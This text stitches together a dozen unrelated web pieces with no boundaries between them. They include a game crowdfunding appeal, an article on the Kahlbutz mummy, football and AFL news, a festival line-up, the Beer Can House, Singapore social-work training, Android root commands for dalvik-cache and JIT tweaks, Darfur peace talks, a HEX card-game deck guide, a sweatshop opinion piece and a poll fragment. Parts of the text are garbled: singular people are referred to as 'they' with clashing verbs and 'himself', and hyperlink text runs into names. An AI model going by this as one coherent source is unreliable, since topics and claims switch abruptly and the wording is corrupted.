Your donations will be used to make Thoughts? the best game it can be. The first thing we need are licenses for Unity3d pro, as well as Autodesk Maya. After that the money will be used to fund a sound director to turn this into something amazing, as well as all the legalities such as copyrights. All extra funds will be used to increase the quality of this game to ensure for better content and more of it. This project and its team are fully committed to its success and release. We are a young team, yes, but that does not mean we don't work as hard at what we do or care any less about it. We plan on meeting our goal and delivering the best possible product. This is not just for fun or just something to work on in our spare time, it is a job that we plan on doing and doing well. We can do it, but not alone. We need you: the backers.
We ask you to come with us and work towards something special, to help a group of ambitious youths make a video game of which everyone involved - both the producers and backers - can be proud.
Complete view of the Kahlbutz mummy
Christian Friedrich von Kahlbutz (1651 in Kampehl, Brandenburg – 1702 in Kampehl) was a German knight, who is today most famous because of the state of preservation of their body; no noticeable mummification process was used upon their death. Today the preserved corpse is a tourist attraction.
Background [ edit ]
According to local legend, "Knight Kalebuz," as they were known, frequently exercised the right of droit du seigneur. They had eleven children of their own and at least thirty other illegitimate children. While exercising this "right" in July 1690, they chose the bride of a shepherd from Bückwitz. They refused them and because of the laws governing the right of first night, they murdered the shepherd. Although there were no witnesses, the shepherd's bride, Maria Leppin, accused Kahlbutz of the murder and took them to court in Dreetz (Brandenburg). As an aristocrat they had special rights and could swear an oath of innocence before the court in order to free himself. Kahlbutz did this and was immediately acquitted.
Kahlbutz died at the age of 52 and was laid to rest in a double coffin in the family tomb. In 1783 the last of the von Kahlbutz line died. While the church of Kampehl was being renovated in 1794 the coffins in the church were going to be buried in the cemetery like all the other coffins. When the coffins were opened it was discovered that all of the corpses except that of the Knight Kahlbutz had decayed.
Legend [ edit ]
The local populace quickly found an explanation for the Mummy of the Knight of Kahlbutz. They said that it was God's punishment for the murder of the shepherd. It had been said that Kahlbutz had sworn before the court, "It was not I, otherwise after my death my body will not decay".
Natural mummification [ edit ]
Mummy of Christian Friedrich von Kahlbutz
Christian Friedrich von Kahlbutz, detail
Several tests have been done on the mummy of the knight to figure out why a body that apparently was not embalmed has not undergone the natural decay process. In the 1890s, Rudolf Virchow and Ferdinand Sauerbruch tested the mummy as did Charité, the largest university hospital in Europe, but all without success. It remains a mystery as to why Kahlbutz's corpse has not decayed, but there are a few other similar cases where the natural decay process has not affected the individual.
The natural decay process of a corpse can be stopped or retarded under certain circumstances, in which the corpse becomes leathery. Air conditions surrounding the body as well as the condition of the ground in which it is buried are most often contributing factors. Absolute dryness, local radioactivity, or other ground factors such as acidity or salts. Also hermetically sealed coffins without steadily moving air can contribute. Likewise, a small ingestion of poisonous medicines, i.e. very small quantities innocuous to an individual, during one's lifetime can aid in the mummification process after death. These kinds of substances are not readily detectable long after death though since the fat and water in the corpse changes and evaporates over time.
Today it is accepted that Kahlbutz suffered from some kind of illness, which caused an emaciation of their body. Possible diseases that they suffered from are cancer, muscular dystrophy, and tuberculosis. There is evidence that they did in fact suffer from the latter. According to several sources, Kahlbutz suffocated on their own blood, which suggests that shortly before their death they lost a great deal of blood. After their death they were buried in an oak double coffin. Bodily decay may have been prevented by the fact that prior to being hermetically sealed in the coffin, they had lost a great deal of blood, in combination with the lack of soil containing decay-accelerating materials.
See also [ edit ]
Incorruptibility, a property of the bodies of certain saints which, though not mummified, have not decayed
References [ edit ]
A.C. Aufderheide: The geography of mummies. – In: A.C. Aufderheide (ed.): The Scientific Study of Mummies. Cambridge University Press, Cambridge 2003. p.: 170.
This article is based on a translation of an article from the German Wikipedia.
Houston AD: Potential Power Five football opponents see UH as "too formidable"
The University of Houston's recent success against Power Five schools has made it difficult to schedule future non-conference games, according to athletic director Hunter Yurachek.
The Cougars had won seven straight football games against Power Five opponents -- including Florida State, Oklahoma and Louisville (twice) -- before losing to Texas Tech earlier this season.
"[It] was both a blessing and a curse for us," Yurachek wrote in response to a scheduling question in their monthly 'Ask The AD' segment on the athletic department's website. "The curse portion coming in non-conference scheduling where some programs see the University of Houston as too formidable of an opponent."
As the Cougars have become one of the top programs from the Group of Five, Yurachek said finding willing takers for non-conference games has become increasingly difficult. UH has future home-and-home series with Washington State, Texas Tech and Kansas, along with games against Arizona, Oklahoma and Vanderbilt.
A few years ago Yurachek said the preference would be to not schedule any opponents from Football Championship Subdivision. The Cougars have maintained that course, only adding Texas Southern in 2018 as part of an agreement to use its basketball arena while the Fertitta Center is under construction. UH has upcoming games against Rice, UTSA and North Texas from Conference USA and Georgia Southern (Sun Belt).
Houston head coach Major Applewhite smiles on the sidles in the second half of their game against East Carolina, Nov. 4, 2017, in Houston, TX. (Michael Wyke / For the Chronicle) Houston head coach Major Applewhite smiles on the sidles in the second half of their game against East Carolina, Nov. 4, 2017, in Houston, TX. (Michael Wyke / For the Chronicle) Photo: Michael Wyke, Freelance Photo: Michael Wyke, Freelance Image 1 of / 15 Captions Close Houston AD: Potential Power Five football opponents see UH as "too formidable" 1 / 15 Back to Gallery
"We are constantly working on adding non-conference games against Power 6 opponents who see the advantage of heading to the nation's fourth-largest city and one of the most fertile recruiting grounds nationally to play a game against a strong opponent who will boost strength of schedule ratings for postseason implications," Yurachek wrote. "Unfortunately that challenge sometimes supersedes the goal of total wins in a season."
Farmfestival have released their full list of acts for Friday and Saturday for the very first time! So you don't miss out on their most accomplished Friday night line up to date. You can now rest assured in the knowledge you know who is playing and when. And just how will they cram in all this fruitful jubilation?! Well, the Farmfestival gates will be opening at 12 noon on the Friday, meaning a full afternoon of enjoyment awaits. So be sure to book the whole day off and get down early doors, or the cider will get warm!
£40 weekend tickets available now
Line Up Additions:
Farmfestival is honoured to announce Hacienda DJ legend Graeme Park will be joining them, an original smiley face protagonist! He'll be headlining the Civilisation of The Rough (COR) tent, who are bringing their self styled ‘secret underground disco soiree' to the festival for the first time. Saturday's mainstage will host the charmingly infectious Polly and the Billets Doux, who'll be bringing their new EP and acclaimed live set for the afternoon. Also on Saturday, the festival are delighted to have the 7 piece antics of Francis & Boyd joining them in The Den, for a late night hoedown.
Fremantle will play their 500th game against Geelong this Sunday at Domain Stadium.
A lot can happen in 500 games of footy, and Fremantle will play their 500th AFL game this Sunday against Geelong at Domain Stadium.
It's a suitable occasion for a milestone game, with the fans to be decked out in purple for the annual Starlight Purple Haze Game, proudly supported by Fremantle Ports.
Take a stroll through the most notable moment's in Fremantle history.
Game 1, 1 April 1995 – Freo made their AFL debut against Richmond at the MCG. Todd Ridley kicked the first goal in club history, and Freo almost pulled off a victory with a five goal to two final quarter, but lost to the Tigers by 5 points.
Game 3, 15 April 1995 – Freo broke through with their first win in the AFL, a 43-point win over Fitzroy at the Western Oval. Winston Abraham led the way with three goals.
Game 4, 21 April 1995 – First win at home: a 19-point win over Geelong at the WACA.
Game 5, 29 April 1995 – Shaun McManus made their AFL debut at the Western Oval against Footscray, picking up 14 disposals and two tackles as Freo dropped a heartbreaker by two points.
Game 9, 28 May 1995 – Freo's first win at Subiaco Oval: a 54-point demolition of the Brisbane Bears, led by a 27-point disposal effort from inaugural captain Ben Allan.
Game 52, 18 May 1997 – Quenton Leach kicked a goal after the siren against Brisbane to give Freo a five point win at Subiaco Oval.
Game 98, 4 June 1999 – Tony Modra kicked a bag of 10 goals, the most for a Fremantle player in a game, as Freo defeated Melbourne by 54 points at the MCG.
Game 104, 18 July 1999 – After dropping the first nine Western Derbies, Fremantle broke through to defeat West Coast by 47 points. The game kick-started Freo's ascendency in the rivalry, winning 20 of the next 35 derbies.
Game 111, 11 March 2000 – Paul Hasleby made an impressive AFL debut at Subiaco Oval against Geelong, racking up 30 disposals. They would go on to win the AFL Rising Star that year, and play 208 games for the club.
Game 115, 8 April 2000 – Matthew Pavlich kicked two goals in their debut against Melbourne at the WACA. Including their debut game, the Freo great would play 353 of Fremantle's next 385 games.
Game 131, 30 July 2000 – The infamous Demolition Derby saw Freo overcome a 32-point half time deficit to win by a point. Up front, Clive Waterhouse kicked seven goals.
Game 162, 18 May 2002 – Jeff Farmer goaled after the siren against their old side Melbourne to seal a five point win at Subiaco Oval.
Game 190, 5 July 2003 – After working their way into the side from the rookie list, Aaron Sandilands picked up 31 hit-outs against Brisbane to earn an AFL Rising Star nomination.
Game 194, 2 August 2003 – Fremantle hosted their first ever Starlight Purple Haze Game in a 21-point win over Richmond, raising $14,000 for seriously ill kids and their families. Over the following 15 years, Fremantle and their fans would donate more than a million dollars to the Starlight Children's Foundation.
Game 199, 5 September 2003 – After finishing fifth in the home and away season, Fremantle played Essendon at Subiaco Oval in their first ever final.
Game 228, 30 April 2005 – David Mundy made their debut for Freo at the MCG, picking up 12 disposals as Fremantle defeated Melbourne by 14 points.
Game 229, 8 May 2005 – Matthew Pavlich's six goals at Subiaco Oval helped Fremantle to their highest total in club history, kicking 28.12 (180) against Collingwood. The 112-point winning margin also gave Fremantle their first 100+ point win.
Game 237, 17 July 2005 – Shane Parker became the first Fremantle player to reach the 200-game milestone, and celebrated by kicking their first goal in almost four seasons as Freo defeated Carlton at the MCG.
Game 242, 19 August 2005 – After kicking a goal after the siren to defeat St Kilda by five points, Justin Longmuir threw themselves into the arms of the fans at a packed Subiaco Oval.
Game 247, 30 April 2006 – The infamous Sirengate game saw Fremantle awarded the win on a protest. The umpires did not initially hear the final siren with Fremantle leading by a point, allowing St Kilda to ‘tie' the game seconds later.
Game 267, 15 September 2006 – 42,505 fans packed Subiaco Oval to see Fremantle win their first ever final against Melbourne, qualifying the side for the first Preliminary Final in club history.
Game 290, 1 September 2007 – Matthew Pavlich kicked four goals against Port Adelaide at Football Park to bring their 2007 season total to 72, eclipsing Tony Modra's mark of 71 in 1999 for the most goals by a Freo player in a season.
Game 308, 3 August 2008 – Freo sent off 228-game legend Shaun McManus in style with an 83-point thrashing of West Coast. It was a typical McManus performance with six tackles and 21 disposals.
Game 313, 29 March 2009 – Stephen Hill and Nick Suban made their AFL debuts against the Western Bulldogs in Freo's 2009 Starlight Purple Haze Game.
Game 323, 6 June 2009 – Michael Walters kicked their first goal for Freo in their debut against Port Adelaide at Football Park.
Game 339, 25 April 2010 – Nat Fyfe kicks a goal in their debut as Freo run out 39-point winners over Richmond at Subiaco Oval.
Game 381, 31 March 2012 – Ross Lyon coached their first game for Fremantle, taking their side to a four-point win over Geelong at Subiaco Oval.
Game 404, 8 September 2012 – A 16-point Elimination Final win against Geelong at the MCG gave Fremantle their first ever victory in an interstate final.
Game 424, 11 August 2013 – 15 individual goalkickers contributed to a 113-point win over GWS at Subiaco Oval, giving Freo their largest win in club history.
Game 425, 18 August 2013 – Lee Spurr made their AFL debut in Fremantle's 386th game, but it wasn't until game 425 that they kicked their first AFL goal. The overjoyed defender's celebration on the middle of the MGC was the highlight in Freo's 95-point win over Melbourne.
Game 428, 7 September 2013 – Freo replicated their 2012 interstate win with another against Geelong, this time at Kardinia Park. Stephen Hill's timely interchange and goal to seal the win continues to be one of the most exciting moments in Fremantle history.
Game 429, 21 September 2013 – The chant of “MCG MCG” rang around Subiaco Oval as Fremantle defeated Sydney by 24 points to book their first ever Grand Final berth.
Game 430, 28 September 2013 – That “one day in September” didn't go Freo's way, but the Grand Final defeat to Hawthorn was the culmination of a week that saw tens of thousands of Freo cross the Nullarbor to paint Melbourne purple - witnessing Matthew Pavlich lead the side out onto the MCG on Grand Final day.
Game 444, 21 June 2014 – Fremantle conceded just 3.4 (22) to the Brisbane Lions to set their lowest conceded score in club history, on the way to an 83-point win.
Game 445, 5 July 2014 – Hayden Ballantyne played their 100th game against Melbourne in Darwin, becoming just the third Sandover Medallist to play over 100 AFL games since the VFL expanded in 1986.
Game 475, 30 August 2015 – A 54-point victory over Melbourne gave Freo their 17th win of the 2015 season, securing the club their first Minor Premiership.
Game 485, 14 May 2016 – Lachie Neale racked up 30 handballs in their 38-disposal effort against Hawthorn, the highest in Fremantle history and equal fourth highest in the history of the AFL.
Game 498, 20 August 2016 – David Mundy became the second player in Fremantle history to reach the 250-game milestone.
Game 499, 28 August 2016 – Matthew Pavlich is given a send-off that will live long in the hearts of Freo fans as Fremantle defeated the Western Bulldogs by 20 points in their 353rd and final AFL game. The highlight of the game came from the man himself, kicking their 700th career goal in the opening term.
Tickets are still available for Sunday's match through ticketmaster.com.au or by calling 1300 135 915.
The Fremantle Dockers Foundation is proud to have the Starlight Children's Foundation on board as a Principal 'Friend of the Foundation'
In 1968, John Milkovisch, a retired upholsterer for the Southern Pacific Railroad, started on the exterior of the Beer Can house, making a metal canopy that was adorned with strings of beer can top, each piece glittering like garlands in the sunlight.
Beer bottles were repurposed into walls, casting coloured shadows like stained glass. Milkovisch used stacks of recycled bottles and turned them into fences. The broken bottles became mosaic material.
When the entire front and back yard were completely covered because they “got sick of mowing the grass”, they turned to the house itself and began adding aluminum siding – aluminum beer can side, that is.
Over the next 18 years the house, situated in Houston, Texas, disappeared under a cover of flattened beer cans for both practical and decorative reasons. Garlands made of cut beer cans hanging from the roof edges not only made the house sing in the wind, but also lowered the family's energy bills.
It's estimated that over 50,000 cans adorn this monument to recycling.
Advertisement News & Features « Newer Older » News Social workers in Singapore not trained to deal with LGBT issues Reports reveal that three quarters of social workers in Singapore said they have not had any training on LGBT issues. But one group is doing something to change that. Social workers in Singapore feel ill-equipped to attend to clients with LGBT-related issues according to Straits Times.
In November 2015, a study published in the International Social Work journal by six authors from universities and voluntary welfare organisations ollected data from 89 registered social workers in 2007 and found that 77 per cent felt they did not have adequate skills to attend to LGBT issues.
Nearly 70 per cent of the respondents in the study said there was no struggle between their professional values and handling LGBT clients. One of the author's Teh Yang Yang said the lack of training is worrying.
"Without clear ethical codes, social workers and psychologists may rely on personal or organisational principles to implement or recommend sexual orientation change efforts, which have been found by many countries to be harmful and unethical practice," they told Straits Times.
Another study, carried out by LGBT counselling group Oogachaga in 2011, found that 78 per cent of 91 social workers had not received training despite 40 per cent of them having dealt with LGBT clients.
"An untrained professional might not be able to support the client adequately. A client can sense that and may not feel safe to disclose more," said Mr Leow Yangfa, executive director of Oogachaga and a registered social worker. "
Or the social worker could provide wrong information or advice, which will further stigmatise an LGBT client already struggling with sexuality issues."
Since 2009, Oogachaga has conducted more than 50 training sessions and workshops. Attendees are taught sexuality orientation and gender identity, how to work with young LGBT adults and parents of LGBT children. So far they have trained around 1500 counsellors.
Related Links Ooogachaga Singapore
stop clearing your dalvik-cache
Code: mount -a
NOTE: COMMANDS ARE CASE sensitive in LINUX and as such ANDROID!!!!!!
ALL OFF THESE COMMANDS ARE IN lower case. SO Turn off your Auto-Caps options in your keyboard options. These command assume you downloaded the script using your the web browser on your G1/Magic whatever phone and the file is located in /sdcard/download (the default location for web browser downloads).
Code: su mount -o rw,remount /system cp /sdcard/download/86dalvik-cache-fix.txt /system/etc/init.d/86dalvik-cache-fix chown 0:2000 /system/etc/init.d/86dalvik-cache-fix chmod 755 /system/etc/init.d/86dalvik-cache-fix sync reboot
WARNING:
replacing the build.prop may cause problems
Hello....use your head here... the VMLIBS.ZIP is for Motorola DROIDS, why would you put the build.prop file for a DROID on your G1 and expect your apps or ROM to work afterwards?
you need 1 file, it's called libdvm.so
/system/lib a file by the same name already exists there
FYI:
dalvik.vm.execution-mode=int:fast in the /system/build.prop
changed to dalvik.vm.execution-mode=int:jit
dalvikvm -h
1 st bootup is slow and I recommend you let it sit even when desktops are up for a couple of minutes and then reboot it, 2nd and 3rd bootups are faster and smoother response overall even for long durations, days.
FIX YOUR FILE SYSTEM FIRST
Code: #e2fsck -fcpDC0 /dev/block/mmcblk0p2 #reboot recovery For the lazy fingers #e2fsck -fcpDC0 /*/*/*0p2 #reboot recovery
Code: $su #mount -o rw,remount auto /sdcard #cd /sdcard/dusted-donuts #sh backup #sh install #sync #reboot
Code: $su #dalvikvm -h
Code: #mount -o rw,remount auto /sdcard #cd /sdcard/dusted-donuts #sh restore #sync #reboot
prefer to use VMLIBS.ZIP from t3hSteve? This is how you can install using that.
Required:
1. Android 1.6 ROMS with a bit Eclair stuff in the Kernel and framework such as Cyanogen ROM 4.2.x, Super D 1.8 - 19.2, WG Y2.6, FastTest, KingKlick Eclair and more.. This libdvm.so works on Android 2.1 as well as it seems it should..
How to install: (easier to go in recovery mode but can be done through terminal)
1. Download the VMLIBS.ZIP from t3hSteve of allroid.com http://alldroid.org/download/file.php?id=1374
2. You only need the libdvm.so file of which appears to be JIT enabled by default.
3. Backup the original libdvm.so #cp /system/lib/libdvm.so /sdcard/libdvm.so
4. Copy the JIT enabled libdvm.so #cp -f /sdcard/vmlibs/libdvm.so /system/lib/libdvm.so
5. Set permissions on the file #chmod 644 /system/lib/libdvm.so
Optional for disabling: (easier to do vi through recovery console, since the back key escapes out of terminal)
To disable JIT MODE but want to keep the libdvm.so create a local.prop in /data and add dalvik.vm.execution-mode=int:fast
#vi /data/local.prop
press the i key to enter vi interactive mode
type dalvik.vm.execution-mode=int:fast
press back key to exit vi interactive mode
to write the file out and quit vi type :wq
or
restore your backed libdvm.so file from the sdcard.
Sudan and Jem signed a pact last month but talks between the two parties have since stalled [EPA]
Sudan and Jem signed a pact last month but talks between the two parties have since stalled [EPA]
Jem dismisses deal
As the signing ceremony got under way, Jem dismissed the deal saying the LJM had no military force on the ground.
But Al-Tahir al-Feki, a Jem senior official, told the Reuters news agency that their movement would not immediately act on its threat to walk out of Doha talks in protest at the deal.
"The ceasefire is meaningless. It is a ceasefire without any fire," they said, speaking just before the signing.
"We'll not leave Doha. We can't respond now in a reflex reaction. We'll see how it [the new accord] goes."
Tijani Seisi, leader of the LJM - a newly formed umbrella group of 10 movements - that signed the framework deal paving the way for further talks, told Al Jazeera the peace deal will "underpin confidence between the two parties in order to move into the peace process".
"There is a need to unite all these movements because peace will only be achieved if everybody is involved. But the Jem movement does not want to recognise the existence of the other factions on the ground," they said.
Sudan and the Jem signed a pact in Doha last month, seen as a major step towards bringing peace to Darfur, but it has since run into difficulty.
Omar al-Saleh, Al Jazeera's correspondent at the talks in Doha, said: "What we witnessed today is a framework agreement with the government of Sudan and the ceasefire for three months.
"This is the important thing. The breakthrough came last month when 10 rebel groups decided to join forces and they called themselves the Liberation and Justice Movement."
But the Sudan Liberation Army, a major faction led by Abdelwahid Nur, has so far refused to have any negotiations with the government.
Earlier this month it clashed with the army in the fertile Jebel Marra plateau in the heart of Darfur.
On Wednesday, Sudanese authorities re-arrested 15 members of Jem after releasing them following a truce with the group.
Adam Bakr, the lawyer representing the rebels, said they were arrested when they went to Al-Fashir, the capital of north Darfur.
Our correspondent said one of the important things at the signing ceremony was the presence of some regional players like the foreign ministers of Eritrea and Chad.
Chad and Eritrea have been accused in the past of aiding rebel groups fighting Sudan.
Qatar's diplomatic efforts to find peace in Darfur have been complemented by Western powerful countries.
US appeal
Scott Gration, the US envoy to Sudan, urged all parties to the Darfur conflict to seize the "little window" for a peace agreement before presidential, parliamentary and state elections next month.
"If we can get a jump on a Darfur peace agreement, then we should, because there's going to be a lot of things keeping us from focusing on Darfur," Gration told reporters in Nairobi last week before they travelled to Doha.
"The framework agreement "has to be turned into a more formalised agreement ... If there is going to be a comprehensive and lasting peace in Darfur, all rebel groups need to be involved."
The conflict in Darfur has pitched ethnic African tribesmen against the Arab-dominated Khartoum government, claiming up to 300,000 lives - from the fighting as well as famine and disease - and displacing 2.7 million people, according to the UN.
Sudan, whose president Omar al-Bashir has been indicted by the International Criminal Court (ICC) over war crimes in Darfur, disputes the toll and says only 10,000 have died.
Primordial Knowledge – Rocket Rabbit
By Varranis
While safe at home, you comfortably play your favorite Tier 1 deck. Things are going swimmingly. You've already achieved three wins in your Constructed Gauntlet without a single loss! You've got this in the bag. Nothing can stop you. And what is this? Your next opponent is limited roleplayer Boris Blastforge? Clearly your opponent chose the wrong Champion or brought a misguided brew. You chuckle at the dwarf's cocksure grin and malfunctioning jetpack. You shrug when they start with Howling Brave on turn one. A better turn than you hoped. Your lips curl in a scowl as they exhaust the Howling Brave and slams a Rune Ear Hierophant on turn two. Not like this. You play an Exarch of the Egg. Boris' grin widens. Their charge power sends the rocket rabbit hurtling over your lethal Vennen to begin the unending stampede of rhinos. Boris' visor covers their eyes, yet still you know there is no mercy to be found in them.
This may have been you a few weeks ago, before Boris Blastforge took over the meta. But how did this particularly jovial dwarven deviant so quickly overwhelm the meta? The case of Boris Blastforge is an interesting one. To help answer it, let's dive right into today's primordial brew.
OUR PRIMORDIAL BREW
The Wild/Sapphire Boris Blastforge Tempo deck (or as I like to call it, “Rocket Rabbit”) was originally created by Isengard and refined and popularized by JadiimJedi. The list below is one of JadiimJedi's most recent 5-win gauntlet lists.
CHAMPION: Boris Blastforge
4 Rune Ear Hierophants socketed with Minor Wild Orb of Conservation and Major Wild Orb of Dominance
So why is this a deck we're interested in playing in the current meta? The primary reason is that this is the best Rune Ear Hierophant deck. Rune Ear Hierophant is one of the pillars of the current format, and arguably the meta's most defining card. Bringing the best Rune Ear Hierophant deck to the table differentiates you from all the other decks also looking to play the vicious hare. While that is fine and well, one cannot simply claim to be the strongest Rune Ear Hierophant deck without some modicum of proof. Well, Boris has that covered.
Just take a look at Boris Blastforge's Charge Power. Giving a troop flight for one turn doesn't seem all that powerful in a vacuum, however, enabling the first hit from a Rune Ear Hierophant socketed with Major Wild Orb of Dominance is often all you need to snowball the rabbit to a size that forces unfavorable blocks. In fact, our Charge Power is arguably the cleanest way in the game to give Rune Ear Hierophant flight. Both W/D Warmaster Fuzzuko and W/S Winter Moon look to do the same, but Warmaster Fuzzuko requires an extra card and resource investment with Grace of Tiaanost or High Infinitrix while Winter Moon sacrifices Spellshield. Boris Blastforge gets a flying Rune Ear Hierophant with no extra card or resource investment while keeping the all important Minor Wild Orb of Conservation. Having consistent access to Flight also makes Artisanal Cheesesmythe and Exarch of the Egg poor answers to Rune Ear Hierophant.
Did I mention you also get to play your Rune Ear Hierophant on turn 2? While the combination of Howling Brave and Rune Ear Hierophant is nothing new, the duo fit this deck especially well. Other Rune Ear Hierophant decks like Kagulichu and Winter Moon play a more controlling game which doesn't particularly benefit from the tempo Howling Brave generates. Rocket Rabbit on the other hand is an aggressive tempo deck that can leverage Howling Brave's extra resources to snowball a victory. Not only that, but the deck packs a large number of other Coyotle, giving us access to Howling Plains Bluegrass and Wakuna Crowfeather.
The other reason this deck shines in the current meta is that it can effectively main deck hate for Flight troops. Flight has become increasingly popular with old staples like Vampire King and Vampire Princess losing little market share and new fliers like High Infinitrix and Flickering Gobbler eating up a large chunk of the meta pie. Not only are Flight troops popular, but opposing Rune Ear Hierophants are moving toward Flight over Spellshield as a way to dodge popular lethal troops and break open stalemates. Both Vine Lash and Turbulence can answer essentially all the meta's popular Flight troops while remaining high quality removal when combined with Boris Blastforge's Charge Power.
LEARNING TO FLY
Successfully piloting this deck is largely predicated on proper sequencing and use of the Reserves. Tempo decks thrive on efficient resource usage, making it critical for you to understand what you should play when. It isn't always intuitive how you should play your Shard of Instincts and Arcane Focuses or when you should hold resources open for Countermagic. Prophecy can also complicate your sequencing. Do you want to dig for an action with Arcane Focus and then strengthen your next troop with Wakuna Crowfeather? Or do you want to play Wakuna Crowfeather first and then search for the Prophesied troop with Arcane Focus? Neither of those sequences is necessarily right or wrong – it all depends on the current game state.
Several lines are fairly obvious. If you can play to a turn two Rune Ear Hierophants or Lanupaw's Sight, you go for it. Others aren't always so obvious. For example, it is usually correct to play Arcane Focus on turn one if you have a Brown Fox Scout on top of your deck. Brown Fox Scout gains a lot of its value from being an effective extra draw when played from the top of your deck. Putting it back into your deck with Arcane Focus is a good way to ensure you gain that value later in the game rather than drawing a mediocre two drops. Since you play Brown Fox Scout, it's also important to set a stop in your Ready phase to allow you to play a Brown Fox Scout on top of your deck before you draw.
The deck is generally powerful due to the extreme efficiency of the majority of its troops. Cyclone Shaper is somewhat emblematic of this efficiency. While we don't play an extensive number of spells, a reasonable flier which allows you to play Vine Lash for free is incredibly powerful in this deck. We can gain significant tempo just by resolving a Cyclone Shaper and Vine Lash on turn three. In fact, it's rare you will Empower the Cyclone Shaper in this deck due to the deck's aggressive nature. That is unless you happen to Prophesize the Cyclone Shaper with Young Seer. Young Seer both increases the deck's overall efficiency and allows for crazy turns with Cyclone Shaper or Greenpaw Emancipator.
As a tempo deck, your primary goal is to resolve a threat and protect it with Countermagic and removal. The way in which you use this removal is critical to protecting your threats. You need to identify which of your opponent's plays will actually influence the outcome of the game. For example, say you resolved a Rune Ear Hierophant before your opponent and have the opportunity to counter their own Rune Ear Hierophant. Is playing Countermagic here correct? It may not be. Despite the power of Rune Ear Hierophant, you should be ahead if you resolved one first and your opponent resolving one won't change the course of the game much. You may find saving the Countermagic will save you from a more relevant threat or answer later on in the game. Similarly, it's important to save your Vine Lashs and Turbulences for when they matter most. While it may be tempting to float a Succulent Cluckodon and cause a little Turbulence, you may need that removal for a more powerful troop like Eternal Sage later. As a side note, it is often as important to save your Charge Power to activate your removal as it is to give your Rune Ear Hierophant Flight. Be mindful of how you spend your charges so that you're not left with a useless Vine Lash later in the game.
THE COMPETITION
Let's take a look at how to use the deck's Reserves.
BRING IN:
TAKE OUT:
The Morgan McBombus match-up is all about the race. Bring in cheaper removal and life gain and take out more expensive answers like Countermagic. When bringing in Succulent Cluckodon it is generally correct to remove Wakuna Crowfeather since Prophesizing a Cluckodon will break Wakuna's Prophecy chain. Making this switch also prevents you from overloading on four drops.
BRING IN:
TAKE OUT:
How you change your deck for this match-up depends somewhat on their specific build. Vine Lash is stronger if they are playing Vampire Princess in addition to Vampire King, otherwise Turbulence allows for versatility against non-vampire threats. Verdict of the Ancient Kings gives you another answer to Extinction while Greenpaw Emancipator allows you to rebuild the board after an Extinction.
BRING IN:
TAKE OUT:
This match-up is generally good for you despite your removal lacking targets due to high defense and Spellshield. Bring in the Greenpaw Emancipators to increase threat density and upgrade your Vine Lashes to Turbulence.
BRING IN:
TAKE OUT:
Remove your Prophecy cards as the Prophesized cards will just be milled. Verdict of the Ancient Kings and Greenpaw Emancipator come in for the same reasons we brought them in against Kagulichu. Turbulence gives us more answers to Phenteo the Brood Priest.
BRING IN:
TAKE OUT:
Countermagic and Windsinger, Master of the Hunt tend to be too slow in this match-up. You have great targets for Turbulence and Lullaby helps in the Rune Ear Hierophant mirror. Greenpaw Emancipator increases your threat density and helps you keep up with their game plan.
BRING IN:
TAKE OUT:
Wind of Change gives you a huge edge in this match-up assuming they are the constant build. Additional life gain and counters allows you to interact with their linear strategy. Removal is weak here and Wakuna comes out for the Cluckodons.
BRING IN:
TAKE OUT:
Generally, your opponent should re-gem their Rune Ear Hierophants with the Spellshield gem, making Vine Lash very weak. Upgrade it to Turbulence and bring in Verdict of the Ancient Kings for their Countermagic and Mass Polymorph Dingler.
BRING IN:
TAKE OUT:
The mirror will likely be a popular match-up. Tempo is the name of the game here and Rune Ear Hierophant will decide many of these matches. Take advantage of your opponent's lack of board clear and situational removal by taking out your own removal and increasing your threat density. Lullaby provides huge swings and is one of your few ways to interact with Rune Ear Hierophant. Verdict of the Ancient Kings gives you a slight edge against their Countermagic.
LIFT OFF
Rocket Rabbit is a unique deck built to attack the meta. As it rises in popularity, expect decks to target it just as it targeted the decks before. How do you plan to combat the Boris menace? Let me know in the forums!
Be sure to tune into my stream tonight at 3:30 PM PST to see the deck in action in the Constructed Gauntlet. As always, there will be Primal Pack and free Draft, Sealed, and Evolving Gauntlet code giveaways.
See you in the gauntlet,
Varranis | Twitch | Twitter | Team Fade 2 Karma
Varranis is an analyst for professional gaming organization Fade 2 Karma. They have played countless TCGs over the last eighteen years and brings a unique lens to HEX theory crafting and deck building based on their historical experience. Varranis has numerous tournament wins and top finishes to their name across several popular TCGs and has coached and supported players in world championship level events.
Discuss this article in our forums!
On Sweatshops: They're Better Than the Alternative By Art Carden
I just answered an email from some seventh-grade students who were asking about my Forbes.com article “Immigrants, Sweatshops, and Standards of Living.” I suggested they look up Benjamin Powell's work, particularly this article on sweatshops that they wrote for the Library of Economics and Liberty a few years ago. Here's some of what I wrote them specifically:
Sweatshops are an important exercise in appreciating the difference between what we see (people in sweatshops) and what we don't see (the jobs they would have if they didn't have sweatshop opportunities). Sweatshops employ children because the children are available for work and because their next-best opportunities (agriculture or, in some cases, prostitution) are usually worse than sweatshop labor. It is definitely good that the workers at least have opportunities to work in sweatshops because, as research by Powell and others has shown, their other alternatives are even worse. I don't have the numbers in front of me, but sweatshop earnings are better than they are in other lines of employment.
Perhaps I'm reading uncharitably, but I think a lot of sweatshop critics misunderstand the economist's argument. The argument isn't that sweatshop conditions and wages are good in some cosmic sense. Rather, they are better than the available alternatives. By passing laws to regulate and restrict sweatshops, we take away from people the best of a lot of bad alternatives. If we genuinely care about people, we should work to give them more and better options, not fewer and worse.
Democratic presidential front-runner Hillary Clinton Hillary Diane Rodham ClintonSanders: 'I fully expect' fair treatment by DNC in 2020 after 'not quite even handed' 2016 primary Sanders: 'Damn right' I'll make the large corporations pay 'fair share of taxes' Former Sanders campaign spokesperson: Clinton staff are 'biggest a--holes in American politics' MORE would easily defeat GOP counterpart Donald Trump Donald John TrumpHouse committee believes it has evidence Trump requested putting ally in charge of Cohen probe: report Vietnamese airline takes steps to open flights to US on sidelines of Trump-Kim summit Manafort's attorneys say they should get less than 10 years in prison MORE in a general election match-up, according to an NBC News/Wall Street Journal poll released early Monday.
ADVERTISEMENT
Pollsters found Clinton would cruise to a 10-point win over Trump, 50 to 40 percent, with the help of independent and Hispanic voters.
Clinton would also beat Sen. Ted Cruz Rafael (Ted) Edward CruzTrump unleashing digital juggernaut ahead of 2020 Inviting Kim Jong-un to Washington Trump endorses Cornyn for reelection as O'Rourke mulls challenge MORE (R-Texas) by just 3 points, 48 to 45 percent, within the poll's margin of error.
